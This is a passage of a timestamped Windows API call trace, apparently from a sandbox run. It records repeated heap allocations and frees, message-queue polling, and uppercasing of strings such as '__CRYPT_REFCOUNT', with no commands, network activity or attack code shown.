lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0212.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0212.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0212.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.375] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0212.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0212.375] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0212.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0212.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0212.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0212.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0212.375] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0212.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0212.375] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0212.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0212.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0212.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0212.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0212.375] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0212.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0212.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0212.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0212.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0212.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0212.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0212.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0212.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0212.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0212.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0212.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0212.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0212.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0212.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0212.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0212.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0212.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0212.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0212.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0212.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0212.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0212.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0212.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0212.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0212.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0212.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0212.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0212.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0212.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0212.377] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0212.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0212.377] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0212.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0212.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0212.377] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0212.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0212.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0212.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0212.377] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0212.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0212.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0212.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0212.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0212.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0212.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0212.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0212.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0212.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0212.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0212.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0212.378] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0212.378] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0212.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0212.378] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0212.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0212.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0212.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0212.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0212.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0212.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0212.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0212.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0212.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0212.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0212.379] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0212.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0212.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0212.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0212.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0212.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0212.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0212.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0212.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0212.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0212.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0212.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0212.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0212.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0212.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0212.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0212.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0212.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0212.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0212.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0212.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0212.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0212.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0212.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0212.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0212.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0212.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0212.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0212.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0212.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0212.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0212.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0212.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0212.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0212.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0212.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0212.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0212.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0212.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0212.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0212.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0212.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0212.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0212.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0212.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0212.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0212.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0212.381] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0212.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0212.382] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0212.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0212.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0212.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0212.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0212.382] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0212.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0212.382] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0212.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0212.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0212.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0212.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0212.382] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0212.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0212.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0212.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0212.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0212.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0212.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0212.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0212.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0212.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0212.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0212.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0212.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0212.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0212.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0212.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0212.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0212.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0212.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0212.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0212.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0212.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0212.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0212.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0212.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0212.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0212.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0212.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0212.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0212.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0212.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0212.384] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0212.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0212.384] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0212.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0212.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0212.384] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0212.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0212.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0212.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0212.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0212.384] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0212.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0212.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0212.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0212.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0212.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0212.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0212.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0212.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0212.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0212.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0212.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0212.385] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0212.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0212.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0212.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0212.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0212.385] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0212.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0212.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0212.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0212.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0212.385] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0212.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0212.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0212.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0212.386] HeapFree (in: hHeap=0x970000, 